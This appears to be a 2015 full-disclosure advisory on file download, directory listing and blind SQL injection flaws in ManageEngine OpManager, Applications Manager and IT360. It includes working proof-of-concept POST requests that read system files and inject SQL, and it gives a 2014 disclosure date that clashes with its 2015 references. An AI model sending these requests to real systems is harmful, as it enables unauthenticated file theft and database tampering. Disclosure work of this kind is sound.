ManageEngine File Download / Content Disclosure / SQL Injection

`Hi,  
  
This is part 12 of the ManageOwnage series. For previous parts, see [1].  
  
This time we have an arbitrary file download, directory content  
disclosure and blind SQL injection vulnerabilities in ManageEngine  
OpManager, Applications Manager and IT360.  
  
I've pushed two new Metasploit modules into the framework that exploit  
the file download and the content disclosure [2], these should  
hopefully be accepted soon.  
The full advisory text is below, and as always you can get a copy from  
my repo [3].  
  
Regards,  
Pedro  
  
>> Multiple vulnerabilities in FailOverServlet in ManageEngine OpManager, Applications Manager and IT360  
>> Discovered by Pedro Ribeiro ([email protected]), Agile Information Security  
==========================================================================  
Disclosure: 28/01/2014 / Last updated: 28/01/2014  
  
>> Background on the affected products:  
"ManageEngine OpManager is a network and data center infrastructure  
management software that helps large enterprises, service providers  
and SMEs manage their data centers and IT infrastructure efficiently  
and cost effectively. Automated workflows, intelligent alerting  
engines, configurable discovery rules, and extendable templates enable  
IT teams to setup a 24x7 monitoring system within hours of  
installation."  
  
"ManageEngine Applications Manager is a comprehensive application  
monitoring software used to monitor heterogeneous business  
applications such as web applications, application servers, web  
servers, databases, network services, systems, virtual systems, cloud  
resources, etc. It provides remote business management to the  
applications or resources in the network. It is a powerful tool for  
system and network administrators, helping them monitor any number of  
applications or services running in the network without much manual  
effort."  
  
"Managing mission critical business applications is now made easy  
through ManageEngine IT360. With agentless monitoring methodology,  
monitor your applications, servers and databases with ease. Agentless  
monitoring of your business applications enables you high ROI and low  
TOC. With integrated network monitoring and bandwidth utilization,  
quickly troubleshoot any performance related issue with your network  
and assign issues automatically with ITIL based ServiceDesk  
integration."  
  
  
>> Technical details:  
The affected servlet is the "FailOverHelperServlet" (affectionately  
called FailServlet).  
There are definitely more vulnerabilities than the ones identified  
below - for example it is possible to hijack the failover operation  
completely. The ones listed below as the easy ones to find and  
exploit.  
  
  
#1  
Vulnerability: Arbitrary file download  
CVE-2014-7863  
Constraints: unauthenticated in OpManager and AppManager; authenticated in IT360  
Affected versions: ManageEngine Applications Manager v? to v11.Y  
bXXXX; ManageEngine OpManager v8 - v11.Y bXXXXX; IT360 v? to v10.5  
  
POST /servlet/FailOverHelperServlet?operation=copyfile&fileName=C:\\boot.ini  
  
  
#2  
Vulnerability: Information disclosure - list all files in a directory  
and its children  
CVE-2014-7863 (same as #1)  
Constraints: unauthenticated in OpManager and AppManager; authenticated in IT360  
Affected versions: ManageEngine Applications Manager v? to v11.Y  
bXXXX; ManageEngine OpManager v8 - v11.Y bXXXXX; IT360 v? to v10.5  
  
POST /servlet/FailOverHelperServlet?operation=listdirectory&rootDirectory=C:\\  
  
  
#3  
Vulnerability: Blind SQL injection  
CVE-2014-7864  
Affected versions: ManageEngine OpManager v8 - v11.Y bXXXXX; IT360 v? to v10.5  
Constraints: unauthenticated in OpManager; authenticated in IT360  
POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=standbyUpdateInCentral&customerName=[SQLi_1]&serverRole=[SQLi_2]  
POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=standbyUpdateInCentral&customerName=a')%3b+create+table+bacas+(bodas+text)%3b--+&serverRole=a  
  
  
>> Fix:  
For Applications Manager, upgrade to version 11.9 b11912.  
  
For OpManager, install the patch for v11.4 and 11.5:  
https://support.zoho.com/portal/manageengine/helpcenter/articles/vulnerabilities-in-failoverhelperservlet  
Version 11.6 will be released with the patch.  
  
These vulnerabilities remain UNFIXED in IT360.  
  
  
[1]  
http://seclists.org/fulldisclosure/2014/Aug/55  
http://seclists.org/fulldisclosure/2014/Aug/75  
http://seclists.org/fulldisclosure/2014/Aug/88  
http://seclists.org/fulldisclosure/2014/Sep/1  
http://seclists.org/fulldisclosure/2014/Sep/110  
http://seclists.org/fulldisclosure/2014/Nov/12  
http://seclists.org/fulldisclosure/2014/Nov/18  
http://seclists.org/fulldisclosure/2014/Nov/21  
http://seclists.org/fulldisclosure/2014/Dec/9  
http://seclists.org/fulldisclosure/2015/Jan/2  
http://seclists.org/fulldisclosure/2015/Jan/5  
  
[2]  
https://github.com/rapid7/metasploit-framework/pull/4658  
https://github.com/rapid7/metasploit-framework/pull/4659  
  
[3]  
https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_failservlet.txt  
`